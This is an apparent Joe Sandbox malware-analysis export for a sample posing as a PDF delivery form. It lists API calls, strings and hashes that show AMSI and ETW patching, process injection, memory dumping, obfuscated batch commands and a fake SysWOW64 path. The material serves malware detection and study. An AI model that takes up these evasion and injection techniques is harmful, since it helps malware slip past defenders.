ScanBuffer, xrefs: 02CEEE73, 02CEF1CB, 02CEF3F5, 02CEF95C, 02CEFA69, 02CEFB81, 02CEFF55, 02CF00F3, 02CF0299, 02CF03B9, 02CF054E, 02CF0646, 02CF08AF, 02CF0A55, 02CF0BF1, 02CF0D07, 02CF0D95, 02CF10A9, 02CF134A, 02CF145B, 02CF15F8, 02CF19A3, 02CF1AAF, 02CF1CCD, 02CF1DEA, 02CF2105, 02CF21A6, 02CF231A, 02CF24DA, 02CF27FC, 02CF2BF3, 02CF2E92, 02CF2F23, 02CF32DD, 02CF34BF, 02CF3633, 02CF37B6, 02CF3832, 02CF39E9, 02CF3BF3, 02CF3E51, 02CF4083, 02CF42C7, 02CF450F, 02CF47C5, 02CF492B, 02CF4AC0, 02CF4DF8, 02CF5132, 02CF544B, 02CF57CB, 02CF5B04, 02CF5DB6, 02CF5FBB, 02CF6121, 02CF6295, 02CF6311, 02CF6EB4, 02CF6F45, 02CF7375, 02CF7508, 02CF7664, 02CF775C, 02CF7C79, 02CF7F46, 02CF80EC, 02CF8279, 02CF840D, 02CF858C, 02CF8803, 02CF88FB, 02CF8D17, 02CF8FF0, 02CF9164, 02CF939A, 02CF942C, 02CF9764, 02CF9B02, 02CFA031, 02CFA937
MiniDumpWriteDump, xrefs: 02CF899E

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 3130226682-181751239
Opcode ID: ea871028fe7b9ea25244891f9de01eee779dc0c8e4400e1c750b46444223fe77
Instruction ID: 5e23456dbffcbfa304cc462c7968a574bd300634beab4c34eeeb663a65c7d706
Opcode Fuzzy Hash: ea871028fe7b9ea25244891f9de01eee779dc0c8e4400e1c750b46444223fe77
Instruction Fuzzy Hash: FF240D75A501588BDB75EB64CD80ADDB3BAFF88310F1141E5E309AB250DB31AE86EF50

Function 02CF7878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E257DC,02E25820,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C), ref: 02CF7E39
ResumeThread.KERNEL32(00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8), ref: 02CF8483
CloseHandle.KERNEL32(00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C), ref: 02CF8602

Part of subcall function 02CE87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
Part of subcall function 02CE87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
Part of subcall function 02CE87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02D3137C,02CFAFD8,UacInitialize,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,UacScan,02D3137C), ref: 02CF89F4

Part of subcall function 02CD7E18: GetFileAttributesA.KERNEL32(00000000,?,02CEF8CC,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,UacInitialize), ref: 02CD7E23

Part of subcall function 02CEDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDB9E), ref: 02CEDB0B
Part of subcall function 02CEDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CEDB45
Part of subcall function 02CEDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CEDB72
Part of subcall function 02CEDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CEDB7B

Part of subcall function 02CE818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CE8216), ref: 02CE81F8

ExitProcess.KERNEL32(00000000,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,Initialize,02D3137C,02CFAFD8,00000000,00000000,00000000,ScanString,02D3137C,02CFAFD8), ref: 02CFAA25

Strings

SLGatherMigrationBlob, xrefs: 02CFA543
C:\Windows\System32\, xrefs: 02CF7E03
spp, xrefs: 02CF9824, 02CF9857, 02CFA4F4
EtwEventWrite, xrefs: 02CFA873
EnumServicesStatusExW, xrefs: 02CFA10A
NtOpenSection, xrefs: 02CFA642
bcrypt, xrefs: 02CF99E8
NtOpenFile, xrefs: 02CFA80D
SLGetSLIDList, xrefs: 02CF95CD
tquery, xrefs: 02CF97F1
NtReadVirtualMemory, xrefs: 02CFA6DB
SLGetEncryptedPIDEx, xrefs: 02CFA576
VirtualProtect, xrefs: 02CFA26A
RtlQueryProcessDebugInformation, xrefs: 02CFA0CE
EnumServicesStatusA, xrefs: 02CFA0DD
DlpGetArchiveFileTraceInfo, xrefs: 02CF9BDE
NtQuerySystemInformation, xrefs: 02CFA0A1
NtCreateSection, xrefs: 02CFA675
DllGetClassObject, xrefs: 02CF9840, 02CFA510
CreateProcessWithLogonW, xrefs: 02CFA164
NtQueryDirectoryFile, xrefs: 02CFA0BF
SLGetGenuineInformation, xrefs: 02CF959A
NtQuerySecurityObject, xrefs: 02CFA70E
CreateProcessAsUserW, xrefs: 02CFA155, 02CFA173
EnumServicesStatusW, xrefs: 02CFA0EC
NtGetWriteWatch, xrefs: 02CFA5A9
DlpCheckIsCloudSyncApp, xrefs: 02CF9BAB
NtWaitForSingleObject, xrefs: 02CF9DA2
DlpGetWebSiteAccess, xrefs: 02CF9C11
LdrGetProcedureAddress, xrefs: 02CFA7A7
SxTracerGetThreadContextDebug, xrefs: 02CF980D, 02CFA4DD
WriteVirtualMemory, xrefs: 02CFA2D0
VirtualAlloc, xrefs: 02CFA204
sppc, xrefs: 02CF95B1, 02CF95E4, 02CF9617, 02CF964A, 02CFA55A, 02CFA58D
Advapi, xrefs: 02CFA0E2, 02CFA0F1, 02CFA100, 02CFA10F, 02CFA14B, 02CFA15A, 02CFA169
RtlCreateQueryDebugBuffer, xrefs: 02CF9E08
CreateProcessAsUserA, xrefs: 02CFA146
RetailTracerEnable, xrefs: 02CF97DA
OpenProcess, xrefs: 02CFA29D
CryptSIPVerifyIndirectData, xrefs: 02CF98A6
SLIsGenuineLocalEx, xrefs: 02CF9600
Kernel32, xrefs: 02CFA12D, 02CFA13C, 02CFA178
EnumServicesStatusExA, xrefs: 02CFA0FB
NtOpenObjectAuditAlarm, xrefs: 02CF8976
NtOpenProcess, xrefs: 02CF89DA
sppwmi, xrefs: 02CFA527
Initialize, xrefs: 02CF7900, 02CF7AF0, 02CF8AFD, 02CF96E8, 02CF9A86, 02CF9FB5, 02CFA36F, 02CFA8BB
ntdll, xrefs: 02CF897B, 02CF89CB, 02CF89DF, 02CF9D53, 02CF9D86, 02CF9DB9, 02CF9DEC, 02CF9E1F, 02CFA5C0, 02CFA5F3, 02CFA626, 02CFA659, 02CFA68C, 02CFA6BF, 02CFA6F2, 02CFA725, 02CFA758, 02CFA78B, 02CFA7BE, 02CFA7F1, 02CFA824, 02CFA857, 02CFA88A
dbgcore, xrefs: 02CF89A3, 02CF89B7
BCryptVerifySignature, xrefs: 02CF99D1
LdrLoadDll, xrefs: 02CFA774
OpenSession, xrefs: 02CF7884, 02CF79F8, 02CF7A74, 02CF7D71, 02CF7ECA, 02CF8070, 02CF81FD, 02CF8391, 02CF8510, 02CF8613, 02CF8787, 02CF8A05, 02CF8BF5, 02CF8EE6, 02CF906C, 02CF92A2, 02CF94A8, 02CF966C, 02CF995B, 02CF9A0A, 02CF9C4A, 02CF9E41, 02CF9F39, 02CFA3EB, 02CFA9B3
UacScan, xrefs: 02CF7B6C, 02CF7CF5, 02CF7E4E, 02CF7FF4, 02CF8181, 02CF8315, 02CF8494, 02CF870B, 02CF8B79, 02CF8D93, 02CF8F74, 02CF90E8, 02CF931E, 02CFA18E
NtDeviceIoControlFile, xrefs: 02CFA0B0
SetUnhandledExceptionFilter, xrefs: 02CFA336
NtWriteVirtualMemory, xrefs: 02CFA7DA
I_QueryTagInformation, xrefs: 02CF898A
VirtualAllocEx, xrefs: 02CFA237
NtMapViewOfSection, xrefs: 02CFA6A8
mssip32, xrefs: 02CF98BD
NtAlertResumeThread, xrefs: 02CF9D3C
EtwEventWriteEx, xrefs: 02CFA840
SLLoadApplicationPolicies, xrefs: 02CF9633
RtlAllocateHeap, xrefs: 02CF9D6F, 02CF9DD5
advapi32, xrefs: 02CF898F
EnumProcessModules, xrefs: 02CFA119
GetProcessMemoryInfo, xrefs: 02CF9873
DlpNotifyPreDragDrop, xrefs: 02CF9B78
CreateProcessA, xrefs: 02CFA128
kernel32, xrefs: 02CFA21B, 02CFA24E, 02CFA281, 02CFA2B4, 02CFA2E7, 02CFA31A, 02CFA34D
FlushInstructionCache, xrefs: 02CFA303
endpointdlp, xrefs: 02CF9B8F, 02CF9BC2, 02CF9BF5, 02CF9C28
ScanString, xrefs: 02CF797C, 02CF7BE8, 02CF868F, 02CF8A81, 02CF8E6A, 02CF9226, 02CF9524, 02CF98DF, 02CF9CC6, 02CF9EBD, 02CFA467
UacInitialize, xrefs: 02CF887F, 02CF8C9B
CreateProcessW, xrefs: 02CFA137
NtQueryInformationThread, xrefs: 02CFA60F
Ntdll, xrefs: 02CFA0A6, 02CFA0B5, 02CFA0C4, 02CFA0D3
psapi, xrefs: 02CFA11E
NtAccessCheck, xrefs: 02CFA741
NtSetSecurityObject, xrefs: 02CF89C6
ScanBuffer, xrefs: 02CF7C79, 02CF7F46, 02CF80EC, 02CF8279, 02CF840D, 02CF858C, 02CF8803, 02CF88FB, 02CF8D17, 02CF8FF0, 02CF9164, 02CF939A, 02CF942C, 02CF9764, 02CF9B02, 02CFA031, 02CFA937
MiniDumpReadDumpStream, xrefs: 02CF89B2
MiniDumpWriteDump, xrefs: 02CF899E
NtQueryVirtualMemory, xrefs: 02CFA5DC
psapi, xrefs: 02CF988A

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 1548959583-1225450241
Opcode ID: 9e344e87efebf94ba208a7955fe0d1d4bde03e3f7ea55785edec8093392f5782
Instruction ID: 50d25da93de453ed353391e10c71991e09211e1397888eb96ed8420edabd2343
Opcode Fuzzy Hash: 9e344e87efebf94ba208a7955fe0d1d4bde03e3f7ea55785edec8093392f5782
Instruction Fuzzy Hash: FE43FD75A501188BDB75EB64CD809DDB3BAEF88300F1141E5E70AAB354DB31AE86EF50

Function 02CD1724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02CD1FC1), ref: 02CD17D0
Sleep.KERNEL32(0000000A,00000000,?,02CD1FC1), ref: 02CD17E6

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d14fdc011b6a3eb2b72a16cdd759f75e49c27a3b69644c22b3948ce5361b1e60
Instruction ID: 9a228c1d88be467ce6ec230e6335480717b4b86d05aa08202434c556fadb03a5
Opcode Fuzzy Hash: d14fdc011b6a3eb2b72a16cdd759f75e49c27a3b69644c22b3948ce5361b1e60
Instruction Fuzzy Hash: ADB12372A403408BDB25CF69E880355BBE1EBC5310F1E86AED64DCB385D7B0A955CB90

Function 02CE870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02CE8715

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CE8774

Strings

DllGetClassObject, xrefs: 02CE873A
W, xrefs: 02CE8721
amsi, xrefs: 02CE8710

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 9443b615ff9baf3116a5749e12293dfc235a0c86ac19204eeb3a78150c37409e
Instruction ID: 0efef748bf3be79652ba97e4eb3961d969f64bea2f05864f625b4c8035a5d31e
Opcode Fuzzy Hash: 9443b615ff9baf3116a5749e12293dfc235a0c86ac19204eeb3a78150c37409e
Instruction Fuzzy Hash: AAF0225000C380B9E600E6748C45F0FBFCE4B92224F448B1CF2E95A2D2D679D1099BB3

Function 02CD1A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02CD1FE4), ref: 02CD1B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02CD1FE4), ref: 02CD1B31

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a1427b7cf9cc671e0c64418713c508a3a5f042f6d09b184ec6045391c1952f9c
Instruction ID: ef12da97dedad08439648140882a8054b3be7a79a365d305e5a8afb72051bf03
Opcode Fuzzy Hash: a1427b7cf9cc671e0c64418713c508a3a5f042f6d09b184ec6045391c1952f9c
Instruction Fuzzy Hash: 5751D0B16003409FE725CF68D984766BBD1AB85314F1C86AED64CCB386E7F0DA45CBA1

Function 02CEE2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CEE436

Strings

ScanBuffer, xrefs: 02CEE37F
Initialize, xrefs: 02CEE326
OpenSession, xrefs: 02CEE3D8

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 1454073158890da71dc08c32bda2f280f944adfddd755132d9b938c604775650
Instruction ID: 0b650f51b2749fd20a974ad65a8291c91ace2402269ea60563c149cb1ab41238
Opcode Fuzzy Hash: 1454073158890da71dc08c32bda2f280f944adfddd755132d9b938c604775650
Instruction Fuzzy Hash: 2C41FF35B502089BEF24EBE4CD81A9E73FAEF4C360F114435E646A7250DA74AD069F64

Function 02CE840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

WinExec.KERNEL32(?,?), ref: 02CE8478

Strings

WinExec, xrefs: 02CE8429
Kernel32, xrefs: 02CE845B

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: b8b09c33d67dada3df68ac7fa8329b056e6c9c0f99a8d541a325fdebcfd47aee
Instruction ID: 559067b768516b6375b8d3aaeb48c652857a9821cd6998f1b49ad61a6c351bf6
Opcode Fuzzy Hash: b8b09c33d67dada3df68ac7fa8329b056e6c9c0f99a8d541a325fdebcfd47aee
Instruction Fuzzy Hash: 96018C74640204BFEB21EFA4DC51B5A77EDEB48B00F518530B609E3A50DA74ED009F28

Function 02CE8410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

WinExec.KERNEL32(?,?), ref: 02CE8478

Strings

WinExec, xrefs: 02CE8429
Kernel32, xrefs: 02CE845B

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
